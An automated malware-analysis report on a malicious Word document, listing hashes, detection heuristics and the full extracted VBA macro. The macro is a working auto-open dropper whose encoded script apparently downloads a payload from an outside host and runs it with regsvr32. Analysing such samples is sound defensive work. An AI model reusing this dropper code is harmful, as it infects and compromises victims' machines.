Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 59ae833512509475…

MALICIOUS

Office (OOXML)

Size: 80.1 KB
Created: 2021-04-01 06:53:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-04-10
MD5: dec822dfea7dc430d6cfdf9135430019
SHA-1: 9a1cb848c08b506522660b055ca85f1a3c528746
SHA-256: 59ae833512509475e6d56a09cdf8638eeebf42737f87aa594d7525b1f09474d2
Risk score: 170

Heuristics (6)

  • VBA project inside OOXML (severity: medium, 4 related findings, rule OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage (severity: critical, rule OLE_VBA_WSCRIPT)
    Matched line in script:
    Set responseIterator = CreateObject("wscript.shell")
  • CreateObject call (severity: high, rule OLE_VBA_CREATEOBJ)
    Matched line in script:
    Set responseIterator = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens (severity: high, rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro (severity: low, rule OLE_VBA_AUTOOPEN)
    Matched line in script:
    Sub autoopen()
  • Embedded URL (severity: info, rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 9170 bytes
SHA-256: cc6e69353595766359208064ac949dd7ee281c134e6d5f3534bb5603259ffebc
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{C13A8507-A2F6-4E28-B541-EF340F3EB32D}{5087E9D5-51BD-4F90-A5E5-9A223CC28FDE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function iteratorMain()
With frm.button1
iteratorMain = .Tag
End With
End Function
Function documentTmpView()
With frm.button1
documentTmpView = .Caption
End With
End Function
Public Sub button1_Click()
Set responseIterator = CreateObject("wscript.shell")
responseIterator.exec p(iteratorMain) & " " & p(documentTmpView)
End Sub


Attribute VB_Name = "arrayGenericResponse"
Sub autoopen()
listLeftList
End Sub
Function intel(WBuf)
intel = "" & WBuf & ""
End Function
Sub listLeftList()
Dim namespaceLoad As String
namespaceLoad = p(frm.button1.Caption)
Set genericTmpVb = New leftVariableLeft
genericTmpVb.namespaceRightProcedure namespaceLoad, procedureBuf
frm.button1_Click
End Sub
Function valueIndex(textboxText, WMemValue, counterClass)
valueIndex = Replace(textboxText, WMemValue, counterClass)
End Function

Attribute VB_Name = "vbNext"
Function memLib()
memLib = intel("<html><body><div id='content'>fTtlc29sYy5jb3JQcG10OykyICwiZ3BqLm")
End Function
Function borderCountDocument()
borderCountDocument = intel("tuaUxiaWxcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmb3RldmFzLmNvclBwbXQ7KX")
End Function
Function listOptionWindow()
listOptionWindow = intel("lkb2Jlc25vcHNlci5lY25lcmVmZVJlemlTcGF3cyhldGlydy5jb3JQcG10OzEgPS")
End Function
Function classSize()
classSize = intel("BlcHl0LmNvclBwbXQ7bmVwby5jb3JQcG10OykibWFlcnRzLmJkb2RhIih0Y2VqYk")
End Function
Function variableCount()
variableCount = intel("9YZXZpdGNBIHdlbiA9IGNvclBwbXQgcmF2eykwMDIgPT0gc3V0YXRzLmVjbmVyZW")
End Function
Function countCountClear()
countCountClear = intel("ZlUmV6aVNwYXdzKGZpOykoZG5lcy5lY25lcmVmZVJlemlTcGF3czspZXNsYWYgLC")
End Function
Function tmpStorageArray()
tmpStorageArray = intel("JyZ3hwbDQ9dXA5JmhQUzg2UjlpeXdxeExCQ3BvbzdXQz1mZXImNUdkeldnNmZSRl")
End Function
Function indexDeleteSwap()
indexDeleteSwap = intel("dIWUdEc1hBQXo9OUh4RkYmYlZ3S2JjeXhRPWVnYXAmT29vOGVvdnZMdzdzeno5eW")
End Function
Function titleTmpVar()
titleTmpVar = intel("lQME43NHo9ZW1pdCZobTc3MWc4Wj1xJlhLcFZrMmV4U1o9alImcTU9aGNyYWVzJk")
End Function
Function removeAList()
removeAList = intel("9uNU1RMjVQc29DUXFtYz1kaT85bmF4LzI0Mzc4L2NjSExvOS9PaUxXUkZPc3JNVU")
End Function
Function windowTableLen()
windowTableLen = intel("5ZRmRLbFNvQVlwQTVNUHMvOWFLWVVtV0g4ZFdkbG0xVUJYWElwRzExT0cxSmwvZy")
End Function
Function refScreenBorder()
refScreenBorder = intel("9zeXVvZy9tb2Mucm9ycm9oZWthbGIvLzpwdHRoIiAsIlRFRyIobmVwby5lY25lcm")
End Function
Function procVb()
procVb = intel("VmZVJlemlTcGF3czspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbi")
End Function
Function pasteStructIterator()
pasteStructIterator = intel("A9IGVjbmVyZWZlUmV6aVNwYXdzIHJhdg==|fXspZXNub3BzZVJ0c25vYyhoY3RhY")
End Function
Function pointerLibNext()
pointerLibNext = intel("307KSJhdGgua25pTGJpbFxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZldGVsZWQuZ")
End Function
Function copyRight()
copyRight = intel("WNuZXJlZmVSdG5lbXVncmF7eXJ0OykidGNlamJvbWV0c3lzZWxpZi5nbml0cGlyY")
End Function
Function selectCopyReference()
selectCopyReference = intel("3MiKHRjZWpiT1hldml0Y0Egd2VuID0gZWNuZXJlZmVSdG5lbXVncmEgcmF2OykiZ")
End Function
Function databaseQueryIndex()
databaseQueryIndex = intel("3BqLmtuaUxiaWxcXGNpbGJ1cFxcc3Jlc3VcXDpjIDIzcnZzZ2VyIihudXIuKSJsb")
End Function
Function textboxProcIterator()
textboxProcIterator = intel("GVocy50cGlyY3N3Iih0Y2VqYk9YZXZpdGNBIHdlbg==</div><div id='table1")
End Function
Function swapVbCollection()
swapVbCollection = intel("'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>0123456789+/<")
End Function
Function removeLinkDocument()
removeLinkDocument = intel("/div><div id='table3'></div><script language='javascript'>functi")
End Function
Function funcTableProcedure()
funcTableProcedure = intel("on localCountSelect(tableTmp){return(new ActiveXObject(tableTmp)")
End Function
Function tempIndexMemory()
tempIndexMemory = intel(");}function databaseMem(selectListVb){return(repoPointer.getElem")
End Function
Function deleteList()
deleteList = intel("entById(selectListVb).innerHTML);}function structA(){var textCon")
End Function
Function tmpClassOption()
tmpClassOption = intel("st = databaseMem('table1');var tmpStorage = textConst.toLowerCas")
End Function
Function memoryTrust()
memoryTrust = intel("e();var screenTmp = databaseMem('table2');return(textConst + tmp")
End Function
Function querySize()
querySize = intel("Storage + screenTmp);}function collectionRightMain(s){var e={}; ")
End Function
Function tempStructRepo()
tempStructRepo = intel("var i; var b=0; var c; var x; var l=0; var a; var documentIndexC")
End Function
Function windowPasteTable()
windowPasteTable = intel("onst=''; var w=String.fromCharCode; var L=s.length;var textLink ")
End Function
Function memoryTitle()
memoryTitle = intel("= 'charAt';for(i=0;i<64;i++){e[structA()[textLink](i)]=i;}for(x=")
End Function
Function convertPointer()
convertPointer = intel("0;x<L;x++){c=e[s[textLink](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(")
End Function
Function countBuffer()
countBuffer = intel("b>>>(l-=8))&0xff)||(x<(L-2)))&&(documentIndexConst+=w(a));}}retu")
End Function
Function collectionTmpRepo()
collectionTmpRepo = intel("rn(documentIndexConst);};function classVariableDocument(argument")
End Function
Function AButton()
AButton = intel("Button){return argumentButton.split('').reverse().join('');}varG")
End Function
Function selectClear()
selectClear = intel("eneric = window;repoPointer = document;varGeneric.resizeTo(1, 1)")
End Function
Function bufVbTmp()
bufVbTmp = intel(";varGeneric.moveTo(-100, -100);var ExText = repoPointer.getEleme")
End Function
Function genericLen()
genericLen = intel("ntById('content').innerHTML;var ExText = ExText.split('|');var s")
End Function
Function localProc()
localProc = intel("torageDataVar = classVariableDocument(collectionRightMain(ExText")
End Function
Function trustArgument()
trustArgument = intel("[0]));var namespaceTrust = classVariableDocument(collectionRight")
End Function
Function documentTrust()
documentTrust = intel("Main(ExText[1]));</script><script language='javascript'>function")
End Function
Function iteratorCollection()
iteratorCollection = intel(" clearProc(swapTextboxStruct){var globalIndexArgument = localCou")
End Function
Function vbCounterBuf()
vbCounterBuf = intel("ntSelect('msscriptcontrol.scriptcontrol');globalIndexArgument.La")
End Function
Function swapMemoryIndex()
swapMemoryIndex = intel("nguage = 'jscript';globalIndexArgument.Timeout = 60000;globalInd")
End Function
Function mainReferenceIterator()
mainReferenceIterator = intel("exArgument.AddCode(swapTextboxStruct);return(null);}</script><sc")
End Function
Function tempPaste()
tempPaste = intel("ript language='vbscript'>clearProc storageDataVar : clearProc na")
End Function
Function repoSwap()
repoSwap = intel("mespaceTrust : varGeneric.close</script></body></html>")
End Function
Function procedureBuf()
procedureBuf = memLib + borderCountDocument + listOptionWindow + classSize + variableCount + countCountClear + tmpStorageArray + indexDeleteSwap + titleTmpVar + removeAList + windowTableLen + refScreenBorder + procVb + pasteStructIterator + pointerLibNext + copyRight + selectCopyReference + databaseQueryIndex + textboxProcIterator + swapVbCollection + removeLinkDocument + funcTableProcedure + tempIndexMemory + deleteList + tmpClassOption + memoryTrust + querySize + tempStructRepo + windowPasteTable + memoryTitle + convertPointer + countBuffer + collectionTmpRepo + AButton + selectClear + bufVbTmp + genericLen + localProc + trustArgument + documentTrust + iteratorCollection + vbCounterBuf + swapMemoryIndex + mainReferenceIterator + tempPaste + repoSwap
End Function

Attribute VB_Name = "leftVariableLeft"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub namespaceRightProcedure(arrayWindowWindow As String, tableTextbox As String)
Dim mainCollection As FileSystemObject
Set mainCollection = New FileSystemObject
Dim WTextbox As TextStream
Set WTextbox = mainCollection.CreateTextFile(arrayWindowWindow)
WTextbox.WriteLine tableTextbox
WTextbox.Close
Set WTextbox = Nothing
Set mainCollection = Nothing
End Sub

Attribute VB_Name = "copyFunc"
Function p(buttonProcTrust)
p = valueIndex(buttonProcTrust, "@", "")
End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 39936 bytes
SHA-256: 11d187280a234330a77217f292cfddeb5ab83205df84e26e7b262371ce722d5a